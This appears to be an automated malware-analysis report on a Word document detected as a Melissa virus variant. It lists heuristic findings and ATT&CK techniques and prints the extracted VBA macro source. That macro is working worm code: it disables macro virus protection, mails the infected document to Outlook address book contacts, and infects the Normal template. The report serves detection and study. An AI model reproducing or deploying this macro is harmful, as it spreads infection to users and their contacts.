MALICIOUS
200
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1071.001 Web Protocols
The sample contains VBA macros, including a Document_Open macro that uses CreateObject to interact with Outlook. The script attempts to log into MAPI and send emails to recipients from the user's address book, indicating a self-spreading mechanism. The ClamAV detection as 'Doc.Trojan.Melissa-23' strongly suggests a variant of the Melissa virus, known for its email-spreading capabilities.
Heuristics 5
-
ClamAV: Doc.Trojan.Melissa-23 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Melissa-23
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12648 bytes |
SHA-256: d21d23b2005fe7b34fdc6a1407be85803c1f3538a69432a8d8bce11aaa54c46f |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "x"
Attribute VB_Base = "1Normal.x"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
a$ = ""
hk1$ = "HKEY_CURRENT_USER"
sec1$ = "Security"
Set prevDocument = ActiveDocument
Set nextDocument = NormalTemplate
c$ = "Level"
d$ = sec1$ + "..."
e$ = "Macro"
g$ = "Tools"
ot1$ = "Outlook"
h$ = ot1$ + ".Application"
k$ = hk1$ + smo$ + "\"
nam$ = "x"
I$ = nam$ + "?"
aut$ = "y"
j$ = "MAPI"
l$ = "profile"
m$ = "password"
n$ = "Duhalde Presidente "
o$ = "Programa de gobierno 1999 - 2004."
p$ = hk1$ + smo$ + "\"
q$ = "Private Sub Document_Close()"
r$ = "Private Sub Document_Open()"
s$ = "Document"
t$ = " "
On Error Resume Next
If System.PrivateProfileString(a$, b$, c$) <> a$ Then
CommandBars(e$).Controls(d$).Enabled = False
System.PrivateProfileString(a$, b$, c$) = 1&
Else
CommandBars(g$).Controls(e$).Enabled = False
Options.ConfirmConversions = (3 - 3): Options.VirusProtection = (3 - 3): Options.SaveNormalPrompt = (3 - 3)
End If
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject(h$)
Set DasMapiName = UngaDasOutlook.GetNameSpace(j$)
If System.PrivateProfileString(a$, k$, I$) <> aut$ Then
If UngaDasOutlook = ot1$ Then
DasMapiName.Logon l$, m$
For y = 1 To DasMapiName.AddressLists.Count
Set AddyBook = DasMapiName.AddressLists(y)
x1 = 1
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x1)
BreakUmOffASlice.Recipients.Add Peep
x1 = x1 + 1
If x1 > 100 Then oo = AddyBook.AddressEntries.Count
Next oo
BreakUmOffASlice.Subject = n$ & Application.UserName
BreakUmOffASlice.Body = o$
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send
Peep = a$
Next y
DasMapiName.Logoff
End If
System.PrivateProfileString(a$, p$, I$) = aut$
End If
Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
If ADI1.Name <> nam$ Then
If ADCL > 0 Then _
ADI1.CodeModule.DeleteLines 1, ADCL
Set ToI = ADI1
ADI1.Name = nam$
DoAD = True
End If
If NTI1.Name <> nam$ Then
If NTCL > 0 Then _
NTI1.CodeModule.DeleteLines 1, NTCL
Set ToI = NTI1
NTI1.Name = nam$
DoNT = True
End If
If DoNT <> True And DoAD <> True Then GoTo CYA
If DoNT = True Then
Do While ADI1.CodeModule.Lines(1, 1) = a$
ADI1.CodeModule.DeleteLines 1
Loop
ToI.CodeModule.AddFromString (q$)
Do While ADI1.CodeModule.Lines(BGN, 1) <> a$
ToI.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
If DoAD = True Then
Do While NTI1.CodeModule.Lines(1, 1) = a$
NTI1.CodeModule.DeleteLines 1
Loop
ToI.CodeModule.AddFromString (r$)
Do While NTI1.CodeModule.Lines(BGN, 1) <> a$
ToI.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
CYA:
If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, s$) = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, s$) <> False) Then
ActiveDocument.Saved = True: End If
If (Day(Now) + 1) = (Minute(Now) + 2) Then Selection.TypeText t$
End Sub
' Processing file: /opt/analyzer/scan_staging/a46e547cb879473bb3df1f99a574b2c0.bin
' ===============================================================================
' Module streams:
' Macros/VBA/x - 6165 bytes
' Line #0:
' FuncDefn (Private Sub Document_Open())
' Line #1:
' LitStr 0x0000 ""
' St a$
' Line #2:
' LitStr 0x0011 "HKEY_CURRENT_USER"
' St hk1$
' Line #3:
' LitStr 0x0008 "Security"
' St sec1$
' Line #4:
' SetStmt
' Ld ActiveDocument
' Set prevDocument
' Line #5:
' SetStmt
' Ld NormalTemplate
' Set nextDocument
' Line #6
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.